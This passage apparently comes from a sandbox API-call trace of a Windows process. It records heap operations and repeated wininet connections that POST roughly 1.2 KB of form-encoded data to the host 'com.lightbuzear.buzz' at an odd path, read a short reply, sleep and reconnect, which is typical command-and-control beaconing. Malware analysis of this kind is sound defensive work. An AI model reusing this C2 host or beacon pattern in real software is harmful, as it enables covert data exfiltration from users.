(HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800550 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800550 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800190 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800550 [0258.829] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0258.829] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0258.829] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0258.829] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0258.829] FreeLibrary (hLibModule=0x71780000) returned 1 [0258.829] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800550 | out: hHeap=0x4780000) returned 1 [0258.829] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0258.830] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0258.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0258.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0258.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0258.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815b78 [0258.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c38 [0258.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0258.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815b78 [0258.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800410 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800410 | out: hHeap=0x4780000) returned 1 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800460 [0258.831] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800230 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0258.831] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c38 [0258.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0258.832] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815c38 [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002f8 [0258.832] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002f8 | out: hHeap=0x4780000) returned 1 [0258.832] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0258.832] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0258.832] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0258.832] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0258.832] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0258.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0258.833] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0258.833] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815608 [0258.833] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0258.833] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48004d8 [0258.833] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0258.833] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48001b8 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0258.833] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48004d8 [0258.833] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0258.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0258.834] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0258.834] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0258.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a40 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48002a8 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0258.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002a8 | out: hHeap=0x4780000) returned 1 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800410 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0258.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002f8 [0258.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0258.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0258.837] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0258.837] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0259.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002f8 | out: hHeap=0x4780000) returned 1 [0259.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0259.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0259.891] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0259.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0259.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48002a8 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0259.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002a8 | out: hHeap=0x4780000) returned 1 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48004d8 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0259.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800550 [0259.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0259.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0259.894] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0259.894] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800550 | out: hHeap=0x4780000) returned 1 [0259.895] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815608 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0259.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0259.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48001e0 [0259.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0259.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0259.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48001e0 | out: hHeap=0x4780000) returned 1 [0259.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800550 [0259.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0259.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002a8 [0259.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0259.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0259.897] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0259.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0259.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002a8 | out: hHeap=0x4780000) returned 1 [0259.898] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0259.898] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0259.898] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0259.898] FreeLibrary (hLibModule=0x71570000) returned 1 [0259.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0259.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0259.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800230 | out: hHeap=0x4780000) returned 1 [0259.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0259.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0259.900] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0259.900] Sleep (dwMilliseconds=0x2710) [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0259.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0259.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0259.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0259.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c08 [0259.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0259.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c08 | out: hHeap=0x4780000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0259.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815c08 [0259.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0259.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0259.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0259.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0259.912] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0259.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0259.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0259.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0259.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0259.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0259.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0259.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0259.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0259.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c50 [0259.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c80 [0259.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0259.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c80 | out: hHeap=0x4780000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800078 [0259.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0259.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800078 | out: hHeap=0x4780000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800078 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0259.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0259.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0259.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0259.914] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0259.914] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0259.914] FreeLibrary (hLibModule=0x71780000) returned 1 [0259.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0259.914] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0259.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48001e0 [0259.914] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 